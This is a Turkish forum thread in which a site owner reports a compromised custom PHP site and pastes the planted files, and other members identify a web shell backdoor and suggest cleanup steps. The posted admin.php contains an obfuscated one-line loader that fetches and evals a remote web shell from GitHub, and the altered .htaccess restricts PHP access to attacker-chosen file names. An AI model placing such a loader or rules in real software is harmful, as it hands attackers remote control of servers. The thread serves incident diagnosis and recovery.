• 30-07-2021, 12:44:34
    #1
    Not : Sitem wordpress değil özel script

    Arkadaşlar sabah kalktığımda sitemde http 500 hatası alıyordum index.php yerine default bir wp indexi atılmış. Sonra htaccess dosyam değişti kategorilere ulaşamıyordum. Şimdi dikkat ettim dosyaların içinde ab.php ve admin.php diye 2 dosya daha var.

    * bilgisayarımda her zaman antivirüs uygulaması güncel bir şekilde kurulu ve dosyaların hepsini indirip tekrar tarattığımda herhangi bir virüs bulunamadı. Farklı bir yoldan atılmış olabilir mi? Bu aşamada uygulamam gereken adımlar nelerdir?

    admin.php içeriği ;

    <?=/****/[MENTION=63278]Null[/MENTION]; /********/ /*******/ /********/@eval/****/("?>".file_get_contents/*******/("https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php"));/**/?>
    böyle garip bir şey.

    önce değiştirilen index;

    [COLOR=#607D8B][FONT=Titillium Web, sans-serif]<?php[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]/**[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]// * Front to the WordPress application. This file doesn't do anything, but loads[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]* wp-blog-header.php which does and tells WordPress to load the theme.[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]*[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]* @package WordPress[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]*/[/FONT][/COLOR]
    
    [COLOR=#607D8B][FONT="Titillium Web"]/**[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]* Tells WordPress to load the WordPress theme and output it.[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]*[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]* @var bool[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]*/[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]define( 'WP_USE_THEMES', true );[/FONT][/COLOR]
    
    [COLOR=#607D8B][FONT="Titillium Web"]/** Loads the WordPress Environment and Template */[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]require __DIR__ . '/wp-blog-header.php';[/FONT][/COLOR]
    değiştirilen htaccess içeriği ;

    [COLOR=#607D8B][FONT="Titillium Web"]<FilesMatch ".(py|exe|php)$">[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]Order allow,deny[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]Deny from all[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]</FilesMatch>[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php)$">[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]Order allow,deny[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]Allow from all[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]</FilesMatch>[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]<IfModule mod_rewrite.c>[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]RewriteEngine On[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]RewriteBase /[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]RewriteRule ^index\.php$ - [L][/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]RewriteCond %{REQUEST_FILENAME} !-f[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]RewriteCond %{REQUEST_FILENAME} !-d[/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]RewriteRule . /index.php [L][/FONT][/COLOR]
    [COLOR=#607D8B][FONT="Titillium Web"]</IfModule>[/FONT][/COLOR]
  • 30-07-2021, 12:45:51
    #2
    Bu yüzden wordpress kullanmıyorum.. Her hangi bir pluginde açık varsa internette paylaşılıyor ve dork ilede ulaşabiliyorlar sitenizdeki açığa.. Php ile sıfırdan yazılım yazdırmak isterseniz skype adresim imzamda.
  • 30-07-2021, 12:47:44
    #3
    Reveloper
    Hosting firmandan son yedeklerini geri yüklemesini iste.

    sonra güncelle tüm eklentileri
  • 30-07-2021, 12:48:09
    #4
    FidanAtug adlı üyeden alıntı: mesajı görüntüle
    Bu yüzden wordpress kullanmıyorum.. Her hangi bir pluginde açık varsa internette paylaşılıyor ve dork ilede ulaşabiliyorlar sitenizdeki açığa.. Php ile sıfırdan yazılım yazdırmak isterseniz skype adresim imzamda.
    sitem wordpress değil, yazılımım php ile sıfırdan yazıldı zaten
  • 30-07-2021, 12:49:33
    #5
    Kimlik doğrulama veya yönetimden onay bekliyor.
    https://github.com/0x5a455553/MARIJUANA

    MARIJUANA web shell is backdoor build in PHP language with stealth mode that can bypass server security. Every functions has been encoded to hex for bypassing WAF.

    Shell hocam geçmiş olsun. Güvenlikte bır sıkıntı var herhalde gerekli tedbirler alınmamış olabilir.
  • 30-07-2021, 12:49:48
    #6
    cNt adlı üyeden alıntı: mesajı görüntüle
    sitem wordpress değil, yazılımım php ile sıfırdan yazıldı zaten
    Framework kullanıldıysa sıfırdan yazılmış olmaz Plugin bir nevi.
  • 30-07-2021, 12:50:31
    #7
    Site yedeği kur
    ***** dosya var ise sil
    PHP sürümü ve siteni güncelleştir.
    Cpanel Public HTML kısmında yer alan tüm dosyaları TEK TEK incele.
    ADLARINA BAKMA içerik değiştirilebiliyor.
    Shell dosyası olursa sistemden sil ve devam et.
    Bir sorun olursa özelden yazabilirsin (siber güvenlik okuyorum)
  • 30-07-2021, 12:50:34
    #8
    Arkadaşlar sitem wordpress değil. Özel yazılım o yüzden çalışmamış herhalde shell garip bir durum var.

    Burti adlı üyeden alıntı: mesajı görüntüle
    Hosting firmandan son yedeklerini geri yüklemesini iste.

    sonra güncelle tüm eklentileri
    hocam sitem özel script
  • 30-07-2021, 12:50:41
    #9
    Admin.php ile shell çekiyorlar